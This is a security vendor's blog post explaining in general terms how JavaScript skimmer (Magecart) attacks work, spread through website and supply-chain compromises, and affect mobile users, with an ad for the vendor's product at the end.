Ted McKendall

The past few years have seen the emergence and rapid growth of a new threat to websites: Javascript skimmers, also called Javascript sniffers. This week we shall cover some more general observations about Javascript skimmers, and part two next week will get into a bit more detail about what Trusted Knight has seen in the course of our research.


1. Javascript skimmer attacks are actually a hybrid of server-side attack and endpoint malware.

While the initial compromise may be on a web server to implant malicious javascript code, the code itself operates more akin to endpoint malware such as form-grabbing keyloggers. Still one of the most common forms of malware affecting end-users, keyloggers and banking trojans evolved over a decade ago as a way to evade the security infrastructure banks and financial institutions had started placing around their online platforms. Rather than steal from the online banking websites directly, form-grabbing keyloggers work by using malware to infect the bank’s customers and then stealing banking credentials and other data directly from their web browsers as thy access the banking site. Similarly, with Javascript skimmers the javascript runs locally in the user’s web browser, skimming a copy of sensitive form data as users interact with the web page: often payment data but also login credentials and other sensitive information. The data is then exfiltrated directly from the user’s computer to the criminal’s command and control (C2). Thus the data is stolen beyond of the visibility of the business as well as outside of the security controls and defenses they would typically have around their web server infrastructure.


2. Often still called “Magecart” these Javascript skimmer attacks have spread beyond their origins.

The term “Magecart” was originally used to refer to the malware kit used by one of the first groups to popularize this technique, since they used it to great effect on websites that used the Magento ecommerce platform. As other groups copied the technique usage of the Magecart term grew until now it is even sometimes used to refer to Javascript skimmers that are not even targeting Magento-based websites. In fact Javascript skimmers can be seen targeting many popular platforms including Magento, WooCommerce, WordPress, BigCommerce, Shopify, and others.


3. Javascript skimmers can be the result of an attacker compromising your website…

Javascript skimmers are typically relatively small bits of Javascript that are added to a web site. In many cases, an attacker will exploit a vulnerability in your website framework or platform, but rather than break in to steal data directly, the attacker will leave the Javascript skimmer behind, modifying one or a few of your website files with just a line or two of code to link to his malicious code. Thus, every user that visits your site not only views your intended content, but also obtains and runs a copy of his malicious Javascript.


4. …But are often the result of a software supply chain compromise

The vast majority of websites that are hit with Javascript skimmers are through third-party sites. Over two-thirds of websites include code from third-party sources – analytics tools, review sites, chat providers, shopping carts, loyalty services, open-source libraries and utilities, etc. – it is a reality of the modern web application. But every third-party source introduces another vector for possible compromise by an attacker, who can use that as a way to inject his Javascript skimmer into your website. This is sometimes called a supply-chain attack as it can cascade like a real-world supply-chain attack. This is a great way for criminals to scale their attack. For example, a compromise of the PrismWeb platform injected a Javascript skimmer in over 200 campus book and merchandise online stores in the US and Canada, and an attack on e-commerce platform Volusion affected over 6600 websites.


5. Javascript skimmers can affect both mobile and desktop/laptop users

Given the emphasis on Javascript, one might be tempted to think that the main target is desktop and laptop users with a full web browser. Not so – mobile users can be equally affected. Certainly if they are using mobile browsers, mobile users will be as affected as desktop/laptop users. Furthermore, many mobile apps are actually built as empty or partly empty shells that load the majority of content from a website. So if the website is serving a Javascript skimmer to browsers, it will also serve that to the mobile app to run. Such was the case for example with the British Airways website when it was hit with a Javascript skimmer back in September 2018.

Next week’s post will cover more on this topic. Meanwhile, to learn what Protector Air is doing to defend against this threat, contact us.